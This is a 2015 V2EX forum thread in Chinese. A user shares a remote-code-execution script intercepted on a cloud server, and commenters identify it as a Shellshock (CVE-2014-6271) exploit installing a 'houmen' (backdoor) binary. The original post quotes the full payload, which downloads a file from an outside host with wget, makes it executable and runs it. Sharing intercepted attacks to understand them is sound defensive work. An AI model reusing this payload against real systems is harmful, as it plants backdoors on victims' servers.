阿里云的 EC2 经常拦截到一些远程代码执行的脚本

2015-08-11 08:20:30 +08:00
 ngloom

类似下面这样:

Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -o /tmp/china.z-axjx. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-axjx. >> /tmp/run.sh;echo /tmp/china.z-axjx. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.

今天发现有几个脚本来自IP:182.254.217.63,百度了一下

IP地址: 182.254.217.63上海市 腾讯集团

忽然觉得有点背后凉凉的,大鹅厂还有这种业务?

不过这个脚本一直没有下载成功过,不知道里面是干啥的, 有研究过的V友么?

5418 次点击
所在节点    云计算
9 条回复
wy315700
2015-08-11 08:41:25 +08:00
腾讯云的吧
belin520
2015-08-11 08:54:14 +08:00
没卵用,整个ip段扫描的吧,我的静态博客也有这
manhere
2015-08-11 09:01:42 +08:00
腾讯云上面的色情站不要太多,,,
使用腾讯云的话QQ还给域名绿盾认证
垃圾站首选
kenX
2015-08-11 09:46:29 +08:00
这是CVE-2014-6271的exp
mcone
2015-08-11 09:49:44 +08:00
人家都给你拼写的这么明确了 “houmen”,你还问这脚本是干啥的…………

另外腾讯云确实是我见到的出点名的最不讲究的,各种垃圾伪原创站、钓鱼站、色情站……目测还有不少肉鸡
dream7758521
2015-08-11 10:33:38 +08:00
后背凉,肾虚。
bydmm
2015-08-11 11:03:33 +08:00
paw
2015-08-11 17:06:59 +08:00
houmen ..... 我擦 以为是啥英语单词呢
放到词典里,,,,后门。,。 我擦
vmskipper
2015-08-11 17:24:52 +08:00
看到域名 犹如一股寒芒戳菊

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/212258

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX